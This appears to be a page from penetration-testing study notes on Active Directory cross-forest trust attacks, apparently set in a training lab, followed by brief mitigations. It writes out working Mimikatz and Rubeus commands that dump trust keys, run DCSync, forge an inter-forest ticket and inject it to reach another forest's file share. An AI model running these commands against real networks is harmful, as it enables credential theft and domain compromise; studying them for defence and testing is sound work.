Cross Forest Attacks

General

Same attack flow as with cross-domain attacks
But: trust between forest must be established manually
No implicit trust
Cannot abuse SID because of SID filtering
We only get the privileges the user we are impersonating has in the target forest

Exploitation

# Get trust key for the inter-forest trust
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\ecorp$"'

# Forge inter-forest TGT
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /user:Administrator /target:eurocorp.local /rc4:9a3dafc4139bc3fb7b6dade2a35d6f74 /service:krbtgt /ticket:forest_tgt.kirbi"'

# Request and inject TGS for CIFS service using Rubeus
.\Rubeus.exe asktgs /ticket:forest_tgt.kirbi /service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt

# Check access
ls \\eurocorp-dc.eurocorp.local\SharedWithDCorp\

Mitigation

SID Filtering

Avoid attacks which abuse SID history attribute across forest trust
Enabled by default on all inter forest trusts. Intra forest trusts are assumed secured by default (MS considers forest and not the domain to be a security boundary)
But, since SID filtering has potential to break applications and user access, it is often disabled

Selective Authentication

If configured in an inter-forest trust, users between trusts will not be automatically authenticated
Invididual access to domains and servers in the trusting domain/forest should be given

PreviousCross Domain Attacks NextMSSQL Servers

Last updated 2 years ago